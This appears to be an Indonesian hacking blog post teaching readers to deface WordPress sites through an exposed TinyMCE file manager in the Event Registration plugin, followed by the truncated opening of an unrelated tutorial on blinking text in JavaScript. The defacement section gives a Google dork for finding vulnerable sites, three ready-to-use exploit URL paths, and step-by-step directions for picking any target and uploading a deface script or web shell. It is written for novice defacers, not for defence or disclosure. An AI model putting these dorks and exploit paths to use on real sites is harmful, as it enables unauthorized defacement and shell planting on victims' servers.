Deface metode WP Event Registration File Upload

Kali ini Mimin Bakal Memberikan tutorial Deface Lagi. Oke dari pada berlama-lama, langsung saja ke tutorialnya.

Dork:

inurl:/wp-content/plugins/event-registration/jscripts/tiny_mce

*Kembangin Dork Bila Perlu

Exploit:

Exploit 1 => /wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true

Exploit 2 => /wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/upload.php?path=/home/[DIRECTORY-NAME-HERE]/public_html/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files

Exploit 3 => /wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&url=/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/Select%20file&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true

Langkah Pertama

Langka Pertama Kita Dorking Dulu Di Google Menggunakan Dork Diatas.

Langka Kedua

Langka selanjutnya, Pilih Salah Satu Web Yang Ingin Di-Deface.

Langka Ketiga

Setelah Masuk Ke Web Yang Ingin Kita Deface, Saat nya Masukkan Exploit Di belakang URL Web target Kalian, Pilih Salah Satu Exploit Diatas, Disini Saya Menggunakan Exploit Nomor 1.

Note:*Tidak Semua Web Bisa Menggunakan Exploit Nomor1, Kalian Bisa mencoba satu persatu exploit diatas.

Langkah Ke-Empat

Jika sudah memasukkan Exploit tadi, Maka Tampilannya Kurang lebih seperti ini, Tampilannya sepeeti File Manager!

Langkah Ke-Lima

Klik Ikon Yang ditunjuk pada Pada Gambar Tersebut, Maka Kalian Akan Dibawah Ke Halaman File Upload, Tampilannya Kurang lebih Seperti Ini.

Sihlakan Upload Script Deface Kalian, Upload Shell Juga Bisa Tapi Itu Semua tergantung dari webnya dan juga keberuntungan Kalian saja😊.

Langkah Ke-Enam

Setelah Berhasil Mengupload Script Deface maupun Shell Yang kalian Uploas Tadi, Kalian akan dibawa kembali ke Halaman File Manager nya kembali.

Untuk Mengecek File Kalian Sudah Ter-upload atau tidaknya, kalian bisa patch nya dengan cara menambahkan /wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files/ dibelakang web target kalian. Sehingga menjadi seperti Ini:

https://target.com/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files/

Dan Booummm....

Ok sekian dulu tutorial kali ini, semoga bermanfaat Buat Para Defacer Awam😊

Baca Juga: DEFACE METODE ROXY FILEMANAGER

*Mohon Maaf Jika Ada salah Pengetikan pada Artikel Kali ini.

Sekian dulu yah,Trimakasih❤️

Cara Membuat Text Berkedip Dengan JavaScript

Hai sobat codes , kali ini mimin Bakal Share Sebuah Tutorial Bagaimana Sih Caranya Membuat Sebuah Text Berkedap Kedip Hanya Dengan Menggunakan JavaScript, Untuk Memulai Membuat Text Berkedap Kedip, Buat Lah Sebuah File Baru Dengan Nama Sesuai Keinginan kalian. Berikan extensi file tersebut dengan extensi HTML. Contoh : berkedip.html Langkah Pertama Copykan Code HTML berikut ke file yang telah Kalian Buat. <!DOCTYPE html> <html> <head> <title>Contoh Text Berkedip</title> </head> <body> </body> </html> Langkah Kedua Kemudian, Tambahkan Kode JavaScript Berikut ini. <script src="http://code.jquery.com/jquery-latest.js" type="text/javascript"></script> <script> setInterval(function(){ $(".kedip").toggle(); },400); </script> Letakkan dibawah tag <body> . Baca Juga: Cara Redirect Halaman Web Menggunakan JavaScript Langkah Ketiga Untuk Membuat Text nya menjad...

Baca Lebih Lanjut »

EAGLEcodes

Search This Blog